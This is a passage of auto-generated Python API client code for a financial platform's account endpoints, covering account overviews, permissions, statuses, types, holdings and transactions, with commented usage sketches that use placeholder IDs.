all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_account_overview_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if self.api_client.client_side_validation and ('account_id' not in params or
params['account_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account_id` when calling `get_account_overview_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['account_id'] = params['account_id'] # noqa: E501
query_params = []
if 'ascending' in params:
query_params.append(('ascending', params['ascending'])) # noqa: E501
if 'order_by' in params:
query_params.append(('order_by', params['order_by'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account/{account_id}/account_overview', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_account_permission_using_get(self, account_id, **kwargs): # noqa: E501
"""Get an account permission # noqa: E501
Get an account permission # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_account_permission_using_get(account_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_id: account_id (required)
:return: AccountPermissionVO
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_account_permission_using_get_with_http_info(account_id, **kwargs) # noqa: E501
else:
(data) = self.get_account_permission_using_get_with_http_info(account_id, **kwargs) # noqa: E501
return data
def get_account_permission_using_get_with_http_info(self, account_id, **kwargs): # noqa: E501
"""Get an account permission # noqa: E501
Get an account permission # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_account_permission_using_get_with_http_info(account_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_id: account_id (required)
:return: AccountPermissionVO
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_account_permission_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if self.api_client.client_side_validation and ('account_id' not in params or
params['account_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account_id` when calling `get_account_permission_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['account_id'] = params['account_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account_permission/{account_id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AccountPermissionVO', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_account_status_all_using_get(self, **kwargs): # noqa: E501
"""List all account statuses # noqa: E501
Get the account status history information for all accounts. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_account_status_all_using_get(async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool ascending: ascending
:param str filter: filter
:param str order_by: order_by
:param int page: page
:param int size: size
:return: PageAccountStatus
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_account_status_all_using_get_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_account_status_all_using_get_with_http_info(**kwargs) # noqa: E501
return data
def get_account_status_all_using_get_with_http_info(self, **kwargs): # noqa: E501
"""List all account statuses # noqa: E501
Get the account status history information for all accounts. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_account_status_all_using_get_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool ascending: ascending
:param str filter: filter
:param str order_by: order_by
:param int page: page
:param int size: size
:return: PageAccountStatus
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['ascending', 'filter', 'order_by', 'page', 'size'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_account_status_all_using_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'ascending' in params:
query_params.append(('ascending', params['ascending'])) # noqa: E501
if 'filter' in params:
query_params.append(('filter', params['filter'])) # noqa: E501
if 'order_by' in params:
query_params.append(('order_by', params['order_by'])) # noqa: E501
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'size' in params:
query_params.append(('size', params['size'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account_status', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PageAccountStatus', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
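# Usage sketch (not executed): paging through account statuses. The page,
# size and ascending keywords mirror the docstring above; `api` is assumed
# to be an instance of the surrounding API class.
#
#   statuses_page = api.get_account_status_all_using_get(page=0, size=25,
#                                                         ascending=False)
#   # The response is a PageAccountStatus; its exact attributes come from
#   # that generated model and are not shown here.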
def get_account_status_using_get(self, account_status_id, **kwargs): # noqa: E501
"""Retrieve an account status # noqa: E501
Retrieve the information for a specific account status record for an account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_account_status_using_get(account_status_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_status_id: UUID account_status_id (required)
:return: AccountStatus
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_account_status_using_get_with_http_info(account_status_id, **kwargs) # noqa: E501
else:
(data) = self.get_account_status_using_get_with_http_info(account_status_id, **kwargs) # noqa: E501
return data
def get_account_status_using_get_with_http_info(self, account_status_id, **kwargs): # noqa: E501
"""Retrieve an account status # noqa: E501
Retrieve the information for a specific account status record for an account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_account_status_using_get_with_http_info(account_status_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_status_id: UUID account_status_id (required)
:return: AccountStatus
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_status_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_account_status_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_status_id' is set
if self.api_client.client_side_validation and ('account_status_id' not in params or
params['account_status_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account_status_id` when calling `get_account_status_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_status_id' in params:
path_params['account_status_id'] = params['account_status_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account_status/{account_status_id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AccountStatus', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_account_type_all_using_get(self, **kwargs): # noqa: E501
"""List all account types # noqa: E501
List all account types defined for your firm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_account_type_all_using_get(async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool ascending: ascending
:param str filter: filter
:param str order_by: order_by
:param int page: page
:param int size: size
:return: PageAccountType
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_account_type_all_using_get_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_account_type_all_using_get_with_http_info(**kwargs) # noqa: E501
return data
def get_account_type_all_using_get_with_http_info(self, **kwargs): # noqa: E501
"""List all account types # noqa: E501
List all account types defined for your firm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_account_type_all_using_get_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool ascending: ascending
:param str filter: filter
:param str order_by: order_by
:param int page: page
:param int size: size
:return: PageAccountType
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['ascending', 'filter', 'order_by', 'page', 'size'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_account_type_all_using_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'ascending' in params:
query_params.append(('ascending', params['ascending'])) # noqa: E501
if 'filter' in params:
query_params.append(('filter', params['filter'])) # noqa: E501
if 'order_by' in params:
query_params.append(('order_by', params['order_by'])) # noqa: E501
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'size' in params:
query_params.append(('size', params['size'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account_type', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PageAccountType', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_account_type_using_get(self, account_type_id, **kwargs): # noqa: E501
"""Get an Account Type # noqa: E501
Get an account type defined for your firm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_account_type_using_get(account_type_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_type_id: UUID account_type_id (required)
:return: AccountType
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_account_type_using_get_with_http_info(account_type_id, **kwargs) # noqa: E501
else:
(data) = self.get_account_type_using_get_with_http_info(account_type_id, **kwargs) # noqa: E501
return data
def get_account_type_using_get_with_http_info(self, account_type_id, **kwargs): # noqa: E501
"""Get an Account Type # noqa: E501
Get an account type defined for your firm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_account_type_using_get_with_http_info(account_type_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_type_id: UUID account_type_id (required)
:return: AccountType
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_type_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_account_type_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_type_id' is set
if self.api_client.client_side_validation and ('account_type_id' not in params or
params['account_type_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account_type_id` when calling `get_account_type_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_type_id' in params:
path_params['account_type_id'] = params['account_type_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account_type/{account_type_id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AccountType', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_account_using_get(self, account_id, **kwargs): # noqa: E501
"""Retrieve an account # noqa: E501
Retrieve the information for a specific account associated with a client. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_account_using_get(account_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_id: UUID account_id (required)
:return: Account
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_account_using_get_with_http_info(account_id, **kwargs) # noqa: E501
else:
(data) = self.get_account_using_get_with_http_info(account_id, **kwargs) # noqa: E501
return data
def get_account_using_get_with_http_info(self, account_id, **kwargs): # noqa: E501
"""Retrieve an account # noqa: E501
Retrieve the information for a specific account associated with a client. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_account_using_get_with_http_info(account_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_id: UUID account_id (required)
:return: Account
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_account_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if self.api_client.client_side_validation and ('account_id' not in params or
params['account_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account_id` when calling `get_account_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['account_id'] = params['account_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account/{account_id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Account', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
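# Usage sketch (not executed): fetching a single account, synchronously and
# asynchronously, following the docstring above. `api` is assumed to be an
# instance of the surrounding API class; the UUID is a placeholder.
#
#   account_id = "00000000-0000-0000-0000-000000000000"
#   account = api.get_account_using_get(account_id)                 # blocking call
#   thread = api.get_account_using_get(account_id, async_req=True)  # non-blocking
#   account = thread.get()                                          # wait for the Account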
def get_all_account_permission_using_get(self, **kwargs): # noqa: E501
"""List all account permission # noqa: E501
List all account permission # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_account_permission_using_get(async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool ascending: ascending
:param str filter: filter
:param str order_by: order_by
:param int page: page
:param int size: size
:return: PageAccountPermissionVO
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_all_account_permission_using_get_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_all_account_permission_using_get_with_http_info(**kwargs) # noqa: E501
return data
def get_all_account_permission_using_get_with_http_info(self, **kwargs): # noqa: E501
"""List all account permission # noqa: E501
List all account permission # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_account_permission_using_get_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool ascending: ascending
:param str filter: filter
:param str order_by: order_by
:param int page: page
:param int size: size
:return: PageAccountPermissionVO
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['ascending', 'filter', 'order_by', 'page', 'size'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_all_account_permission_using_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'ascending' in params:
query_params.append(('ascending', params['ascending'])) # noqa: E501
if 'filter' in params:
query_params.append(('filter', params['filter'])) # noqa: E501
if 'order_by' in params:
query_params.append(('order_by', params['order_by'])) # noqa: E501
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'size' in params:
query_params.append(('size', params['size'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account_permission', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PageAccountPermissionVO', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_portfolio_holding_agg_all_using_get(self, account_id, **kwargs): # noqa: E501
"""List all account holdings # noqa: E501
Get information for all the securities that are currently being held by an account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_portfolio_holding_agg_all_using_get(account_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_id: UUID account_id (required)
:param bool ascending: ascending
:param str currency_conversion: USD
:param date end_date: end date
:param str filter: filter
:param bool get_latest: true or false
:param str order_by: order_by
:param int page: page
:param int size: size
:param date start_date: start date
:return: PagePortfolioHoldingAgg
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_portfolio_holding_agg_all_using_get_with_http_info(account_id, **kwargs) # noqa: E501
else:
(data) = self.get_portfolio_holding_agg_all_using_get_with_http_info(account_id, **kwargs) # noqa: E501
return data
def get_portfolio_holding_agg_all_using_get_with_http_info(self, account_id, **kwargs): # noqa: E501
"""List all account holdings # noqa: E501
Get information for all the securities that are currently being held by an account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_portfolio_holding_agg_all_using_get_with_http_info(account_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_id: UUID account_id (required)
:param bool ascending: ascending
:param str currency_conversion: USD
:param date end_date: end date
:param str filter: filter
:param bool get_latest: true or false
:param str order_by: order_by
:param int page: page
:param int size: size
:param date start_date: start date
:return: PagePortfolioHoldingAgg
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'ascending', 'currency_conversion', 'end_date', 'filter', 'get_latest', 'order_by', 'page', 'size', 'start_date'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_portfolio_holding_agg_all_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if self.api_client.client_side_validation and ('account_id' not in params or
params['account_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account_id` when calling `get_portfolio_holding_agg_all_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['account_id'] = params['account_id'] # noqa: E501
query_params = []
if 'ascending' in params:
query_params.append(('ascending', params['ascending'])) # noqa: E501
if 'currency_conversion' in params:
query_params.append(('currency_conversion', params['currency_conversion'])) # noqa: E501
if 'end_date' in params:
query_params.append(('end_date', params['end_date'])) # noqa: E501
if 'filter' in params:
query_params.append(('filter', params['filter'])) # noqa: E501
if 'get_latest' in params:
query_params.append(('get_latest', params['get_latest'])) # noqa: E501
if 'order_by' in params:
query_params.append(('order_by', params['order_by'])) # noqa: E501
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'size' in params:
query_params.append(('size', params['size'])) # noqa: E501
if 'start_date' in params:
query_params.append(('start_date', params['start_date'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account/{account_id}/holding', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PagePortfolioHoldingAgg', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
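# Usage sketch (not executed): fetching only the latest holdings for an
# account using the documented get_latest flag. `api` is assumed to be an
# instance of the surrounding API class; the UUID is a placeholder.
#
#   holdings_page = api.get_portfolio_holding_agg_all_using_get(
#       "00000000-0000-0000-0000-000000000000", get_latest=True)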
def get_portfolio_transaction_agg_all_using_get(self, account_id, **kwargs): # noqa: E501
"""List all account transactions # noqa: E501
Get the information for all transactions for an account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_portfolio_transaction_agg_all_using_get(account_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_id: UUID account_id (required)
:param bool ascending: ascending
:param str currency_conversion: USD
:param date end_date: end date
:param str filter: filter
:param str order_by: order_by
:param int page: page
:param int size: size
:param date start_date: start date
:return: PagePortfolioTransaction
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_portfolio_transaction_agg_all_using_get_with_http_info(account_id, **kwargs) # noqa: E501
else:
(data) = self.get_portfolio_transaction_agg_all_using_get_with_http_info(account_id, **kwargs) # noqa: E501
return data
def get_portfolio_transaction_agg_all_using_get_with_http_info(self, account_id, **kwargs): # noqa: E501
"""List all account transactions # noqa: E501
Get the information for all transactions for an account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_portfolio_transaction_agg_all_using_get_with_http_info(account_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_id: UUID account_id (required)
:param bool ascending: ascending
:param str currency_conversion: USD
:param date end_date: end date
:param str filter: filter
:param str order_by: order_by
:param int page: page
:param int size: size
:param date start_date: start date
:return: PagePortfolioTransaction
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'ascending', 'currency_conversion', 'end_date', 'filter', 'order_by', 'page', 'size', 'start_date'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_portfolio_transaction_agg_all_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if self.api_client.client_side_validation and ('account_id' not in params or
params['account_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account_id` when calling `get_portfolio_transaction_agg_all_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['account_id'] = params['account_id'] # noqa: E501
query_params = []
if 'ascending' in params:
query_params.append(('ascending', params['ascending'])) # noqa: E501
if 'currency_conversion' in params:
query_params.append(('currency_conversion', params['currency_conversion'])) # noqa: E501
if 'end_date' in params:
query_params.append(('end_date', params['end_date'])) # noqa: E501
if 'filter' in params:
query_params.append(('filter', params['filter'])) # noqa: E501
if 'order_by' in params:
query_params.append(('order_by', params['order_by'])) # noqa: E501
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'size' in params:
query_params.append(('size', params['size'])) # noqa: E501
if 'start_date' in params:
query_params.append(('start_date', params['start_date'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account/{account_id}/transaction', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PagePortfolioTransaction', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
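# Usage sketch (not executed): pulling a page of transactions for an account
# within a date range. `api` is assumed to be an instance of the surrounding
# API class; the UUID is a placeholder.
#
#   from datetime import date
#
#   txn_page = api.get_portfolio_transaction_agg_all_using_get(
#       "00000000-0000-0000-0000-000000000000",
#       start_date=date(2021, 1, 1),
#       end_date=date(2021, 3, 31),
#       page=0, size=100)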
def insert_account_and_related_permission_using_post(self, acl_client_permission_vo, **kwargs): # noqa: E501
"""create an account permission # noqa: E501
create an account permission # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.insert_account_and_related_permission_using_post(acl_client_permission_vo, async_req=True)
>>> result = thread.get()
:param async_req bool
:param AclClientPermissionVO acl_client_permission_vo: aclClientPermissionVO (required)
:return: AccountPermissionVO
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.insert_account_and_related_permission_using_post_with_http_info(acl_client_permission_vo, **kwargs) # noqa: E501
else:
(data) = self.insert_account_and_related_permission_using_post_with_http_info(acl_client_permission_vo, **kwargs) # noqa: E501
return data
def insert_account_and_related_permission_using_post_with_http_info(self, acl_client_permission_vo, **kwargs): # noqa: E501
"""create an account permission # noqa: E501
create an account permission # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.insert_account_and_related_permission_using_post_with_http_info(acl_client_permission_vo, async_req=True)
>>> result = thread.get()
:param async_req bool
:param AclClientPermissionVO acl_client_permission_vo: aclClientPermissionVO (required)
:return: AccountPermissionVO
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['acl_client_permission_vo'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method insert_account_and_related_permission_using_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'acl_client_permission_vo' is set
if self.api_client.client_side_validation and ('acl_client_permission_vo' not in params or
params['acl_client_permission_vo'] is None): # noqa: E501
raise ValueError("Missing the required parameter `acl_client_permission_vo` when calling `insert_account_and_related_permission_using_post`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'acl_client_permission_vo' in params:
body_params = params['acl_client_permission_vo']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account_permission', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AccountPermissionVO', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def subscribe_account_using_post(self, account_id, alloc_request, **kwargs): # noqa: E501
